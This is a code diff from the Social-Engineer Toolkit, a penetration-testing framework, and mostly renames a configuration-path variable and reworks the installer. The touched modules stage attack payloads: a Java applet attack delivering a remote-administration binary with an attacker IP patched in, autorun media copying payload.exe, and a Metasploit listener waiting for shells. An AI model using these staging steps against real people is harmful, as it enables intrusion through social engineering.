Merge pull request trustedsec#507 from IonoclastBrigham/path-fixes

Path fixes

modules/ratte_module.py

@@ -35,7 +35,7 @@
     pass
 
 definepath = os.getcwd()
-setdir = core.setdir()
+userconfigpath = core.userconfigpath
 
 MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
 
@@ -100,18 +100,18 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
     ############################################
 
     # this part is needed to rename the msf.exe file to a randomly generated one
-    if os.path.isfile(os.path.join(setdir, "/rand_gen")):
+    if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
         # open the file
         # start a loop
-        with open(os.path.join(setdir, "rand_gen")) as fileopen:
+        with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
             for line in fileopen:
                 # define executable name and rename it
                 filename = line.rstrip()
                 # move the file to the specified directory and filename
                 subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
 
     # lastly we need to copy over the signed applet
-    subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait()
+    subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
 
     # TODO index.html parsen und IPADDR:Port ersetzen
     with open(os.path.join(directory, "index.html"), "rb") as fileopen:
@@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
     ############
     # PATCH Server IP into RATTE
     ############
-    with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite:
+    with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
 
         host = (len(ipaddr) + 1) * "X"
         r_port = (len(str(ratteport)) + 1) * "Y"
@@ -271,10 +271,10 @@ def main():
     core.print_info("Starting java applet attack...")
     java_applet_attack_tw(website, javaport, "reports/", ipaddr)
 
-    with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen:
+    with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
         for line in fileopen:
             ratte_random = line.rstrip()
-        subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait()
+        subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
 
     #######################
     # start ratteserver

modules/ratte_only_module.py

@@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
     ############
     # PATCH Server IP into RATTE
     ############
-    with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite:
+    with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite:
 
         host = (len(ipaddr) + 1) * "X"
         r_port = (len(str(ratteport)) + 1) * "Y"
@@ -126,7 +126,7 @@ def main():
     ############
     prepare_ratte(ipaddr, ratteport, persistent, customexe)
 
-    core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
+    core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))
 
     ###################
     # start ratteserver

seproxy

@@ -45,7 +45,7 @@ if operating_system == "posix":
     else:
         proxy_string = "export http_proxy='http://{0}'".format(proxy)
 
-    with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite:
+    with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite:
         filewrite.write(proxy_string)
 
     def kill_proc(port, flag):

setoolkit

@@ -51,8 +51,9 @@ import src.core.setcore as core
 from src.core.menu import text
 from src.core.update_config import update_config
 
-if os.path.isfile(os.path.join(core.setdir, "version.lock")):
-    os.remove(os.path.join(core.setdir, "version.lock"))
+
+if os.path.isfile(os.path.join(core.userconfigpath, "version.lock")):
+    os.remove(os.path.join(core.userconfigpath, "version.lock"))
 
 # check directory and make it
 if not os.path.isdir("src/logs/"):
@@ -69,16 +70,16 @@ operating_system = core.check_os()
 
 # use ~/.set
 if operating_system == "posix":
-    if not os.path.isdir(core.setdir):
+    if not os.path.isdir(core.userconfigpath):
         # create the set variables
-        os.makedirs(core.setdir)
+        os.makedirs(core.userconfigpath)
         # if for some reason it failed to pull the path
         userdir = os.path.join(os.path.expanduser('~'), '.set')
         if not os.path.isdir(userdir):
             os.makedirs(userdir)
 
-if not os.path.isdir(os.path.join(core.setdir, "reports")):
-    os.makedirs(os.path.join(core.setdir, "reports"))
+if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
+    os.makedirs(os.path.join(core.userconfigpath, "reports"))
 
 # check to see if we have python-pycrypto
 try:
@@ -115,7 +116,7 @@ if dns.lower() == "on":
     core.start_dns()
 
 # remove old files
-for root, dirs, files in os.walk(core.setdir):
+for root, dirs, files in os.walk(core.userconfigpath):
     for f in files:
         try:
             match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
@@ -154,13 +155,13 @@ define_version = core.get_version()
 core.cleanup_routine()
 
 # create the set.options routine
-with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite:
+with open(os.path.join(core.userconfigpath, "set.options"), "w") as filewrite:
     filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
 
 try:
     # Remove old Signed_Updates
-    if os.path.isfile(os.path.join(core.setdir, "/Signed_Update.jar")):
-        os.remove(os.path.join(core.setdir, "/Signed_Update.jar"))
+    if os.path.isfile(os.path.join(core.userconfigpath, "Signed_Update.jar")):
+        os.remove(os.path.join(core.userconfigpath, "Signed_Update.jar"))
 
     # initial user menu
     if not os.path.isfile("src/agreement4"):

setup.py

@@ -3,89 +3,115 @@
 #
 # Python installer
 #
-import subprocess
-import sys
 import os
 import platform
+import shutil
+import subprocess
+import sys
 
-# if nix then run installer
-if platform.system() == "Linux":
-    # give installer a null value
-    installer = False
 
-    # Check user ID
-    if os.getuid() != 0:
-        print("Are you root? Please execute as root")
-        exit()
+## pre-install sanity checks ##
+
+# if our command option is true then install stuff
+if len(sys.argv) != 2 or sys.argv[1] != "install":
+    print("** SET Installer **")
+    print("** Written by: Dave Kennedy (ReL1K) **")
+    print("** Visit: https://www.trustedsec.com **")
+    print("\nTo install, run: `# setup.py install'")
+    exit()
+
+platformOS = platform.system()
+if platformOS not in  ["Linux", "Darwin"]:
+    print("[!] Sorry this installer is not designed for %s (only Linux and Mac)"
+          ". Please install the Python dependencies manually." % platformOS)
+    exit()
+
+# Check user ID
+if os.getuid() != 0:
+    print("** SET Installer **")
+    print("[!] Please execute as root: `$ sudo python setup.py install'")
+    exit()
+
+## SET installation ##
+
+# do install of SET itself
+def install(prefix):
+    destdir = "%s/share/setoolkit" % prefix
+    bindir = "%s/bin" % prefix
+    print("[*] Copying setoolkit into the %s directory..." % destdir)
+    subprocess.Popen("cp -rf . %s" % destdir, shell=True).wait()
+
+    print("[*] Installing setoolkit runner to %s..." % bindir)
+    subprocess.Popen("echo \#!/bin/bash > %s/setoolkit" % bindir, shell=True).wait()
+    subprocess.Popen("echo cd {0} >> {1}/setoolkit".format(destdir, bindir), shell=True).wait()
+    subprocess.Popen("echo exec python setoolkit $@ >> %s/setoolkit" % bindir, shell=True).wait()
+    subprocess.Popen("chmod +x %s/setoolkit" % bindir, shell=True).wait()
+
+    print("[*] Installing setoolkit updater to %s..." % bindir)
+    subprocess.Popen("cp {0}/seupdate {1}/".format(destdir, bindir), shell=True).wait()
+    subprocess.Popen("chmod +x %s/seupdate" % bindir, shell=True).wait()
+
+    if not os.path.isdir("/etc/setoolkit/"):
+        print("[*] Creating setoolkit config dir /etc/setoolkit./..")
+        os.makedirs("/etc/setoolkit/")
+    if not os.path.isfile("/etc/setoolkit/set.config"):
+        print("[*] Installing default setoolkit config to /etc/setoolkit./..")
+        shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
+
+    print("[*] We are now finished! To run SET, type `setoolkit'...")
+
+# if linux then run installer
+if platformOS == "Linux":
+    print("[*] Installing dependencies...")
+
+    # if we trigger on sources.list then we know its ubuntu
+    if os.path.isfile("/etc/apt/sources.list"):
+
+        # force install of debian packages
+        subprocess.Popen("apt-get -y install "
+                         "git apache2 python-requests libapache2-mod-php "
+                         "python-pymssql build-essential python-pexpect "
+                         "python-pefile python-crypto python-openssl", shell=True).wait()
+
+    # If pacman.conf exists, we have a Arch based system
+    elif os.path.isfile("/etc/pacman.conf"):
+        subprocess.Popen("pacman -S --noconfirm --needed git python2 "
+                         "python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
+
+        subprocess.Popen("wget https://github.com/erocarrera/pefile/archive/master.zip", shell=True).wait()
+        subprocess.Popen("unzip master.zip", shell=True).wait()
+        subprocess.Popen("chmod a+x pefile-master/setup.py", shell=True).wait()
+        subprocess.Popen("rm -rf pefile-master*", shell=True).wait()
+
+    # if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
+    elif os.path.isfile("/etc/dnf/dnf.conf"):
+        subprocess.Popen("dnf -y install git python-pexpect python-pefile python-crypto pyOpenSSL", shell=True).wait()
+
+    # if sources.list or pacman.conf is not available then we're running
+    # something offset
+    else:
+        print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
+        print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
+        sys.exit()
+
+    if os.path.isdir("/usr/share/setoolkit"):
+        print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
+        sys.exit()
+
+    if not os.path.isfile("/usr/bin/git"):
+        print("[-] Install failed. GIT is not installed. SET will not continue.")
+        print("[!] Install GIT and run the installer again.")
+        sys.exit()
 
     try:
-        # if our command option is true then install stuff
-        if sys.argv[1] == "install":
-            installer = True
-
-    # if index is out of range then flag options
-    except IndexError:
-        print("** SET Dependency Installer **")
-        print("** Written by: Dave Kennedy (ReL1K) **")
-        print("** Visit: https://www.trustedsec.com **")
-        print("\nTo install: setup.py install")
-
-    # if user specified install then lets to the installation
-    if installer is True:
-
-        # if we trigger on sources.list then we know its ubuntu
-        if os.path.isfile("/etc/apt/sources.list"):
-
-            # force install of debian packages
-            subprocess.Popen("apt-get -y install "
-                             "git apache2 python-requests libapache2-mod-php "
-                             "python-pymssql build-essential python-pexpect "
-                             "python-pefile python-crypto python-openssl", shell=True).wait()
-
-        # If pacman.conf exists, we have a Arch based system
-        elif os.path.isfile("/etc/pacman.conf"):
-            subprocess.Popen("pacman -S --noconfirm --needed git python2 "
-                             "python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
-
-            subprocess.Popen("wget https://github.com/erocarrera/pefile/archive/master.zip", shell=True).wait()
-            subprocess.Popen("unzip master.zip", shell=True).wait()
-            subprocess.Popen("chmod a+x pefile-master/setup.py", shell=True).wait()
-            subprocess.Popen("rm -rf pefile-master*", shell=True).wait()
-
-        # if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
-        elif os.path.isfile("/etc/dnf/dnf.conf"):
-            subprocess.Popen("dnf -y install git python-pexpect python-pefile python-crypto pyOpenSSL", shell=True).wait()
-
-        # if sources.list or pacman.conf is not available then we're running
-        # something offset
-        else:
-            print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
-            print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
-            sys.exit()
-
-        if os.path.isdir("/usr/share/setoolkit"):
-            print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
-            sys.exit()
-
-        if not os.path.isfile("/usr/bin/git"):
-            print("[-] Install failed. GIT is not installed. SET will not continue.")
-            print("[!] Install GIT and run the installer again.")
-            sys.exit()
-
-        print("[*] Copying SET into the /usr/share/setoolkit directory...")
-        cwdpath = os.getcwd()
-        subprocess.Popen("cd ..;cp -rf %s /usr/share/setoolkit" % cwdpath, shell=True).wait()
-        print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
-        subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
-        subprocess.Popen("echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
-        subprocess.Popen("echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
-        subprocess.Popen("cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
-        subprocess.Popen("chmod +x /usr/bin/setoolkit", shell=True).wait()
-        print("[*] We are now finished! To run SET, type setoolkit...")
-
-if platform.system() == 'Darwin':
-    subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
+        install(prefix="/usr")
+    except Exception as e:
+        print("[!] Error installing setoolkit", e)
 
-if platform.system() not in  ["Linux", "Darwin"]:
-    print("[!] Sorry this installer is not designed for any other system other "
-          "than Linux and Mac. Please install the Python dependencies manually.")
+if platformOS == 'Darwin':
+    print("[*] Installing dependencies...")
+    subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
+    try:
+        install(prefix="/usr/local")
+    except Exception as e:
+        print("[!] Error installing setoolkit", e)

src/autorun/autolaunch.py

@@ -12,7 +12,7 @@
 definepath = os.getcwd()
 msf_path = core.meta_path()
 me = core.mod_name()
-autorun_path = os.path.join(core.setdir, "autorun")
+autorun_path = os.path.join(core.userconfigpath, "autorun")
 
 trigger = 0
 
@@ -21,23 +21,23 @@
     subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
                      "mkdir {0} 1> /dev/null 2> /dev/null;"
                      "cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
-                                                                   os.path.join(core.setdir, "payload.exe"),
+                                                                   os.path.join(core.userconfigpath, "payload.exe"),
                                                                    os.path.join(autorun_path, "program.exe")),
                      shell=True).wait()
 
-if os.path.isfile(os.path.join(core.setdir, "fileformat.file")):
+if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
     trigger = 2
     subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
                      "mkdir {0} 1> /dev/null 2> /dev/null;"
                      "cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
-                                                                  os.path.join(core.setdir, "template.pdf")),
+                                                                  os.path.join(core.userconfigpath, "template.pdf")),
                      shell=True).wait()
 
-if os.path.isfile(os.path.join(core.setdir, "/dll/openthis.wab")):
+if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
     subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
                      "mkdir {0} 1> /dev/null 2> /dev/null;"
                      "cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
-                                                                   os.path.join(core.setdir, "/dll/*")),
+                                                                   os.path.join(core.userconfigpath, "dll/*")),
                      shell=True).wait()
     trigger = 3
 
@@ -71,9 +71,9 @@
     if choice1.lower() == "yes" or choice1.lower() == "y":
         # if we used something to create other than solo.py then write out the
         # listener
-        if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
-            with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
-                    open(os.path.join(core.setdir, "payload.options")) as fileopen:
+        if not os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
+            with open(os.path.join(core.userconfigpath, "meta_config"), 'w') as filewrite, \
+                    open(os.path.join(core.userconfigpath, "payload.options")) as fileopen:
                 for line in fileopen:
                     line = line.split(" ")
                     filewrite.write("use multi/handler\n")
@@ -86,7 +86,7 @@
         # create the listener
         core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
         subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
-                                           os.path.join(core.setdir, "meta_config")),
+                                           os.path.join(core.userconfigpath, "meta_config")),
                          shell=True).wait()
     else:
         core.print_warning("cancelling...")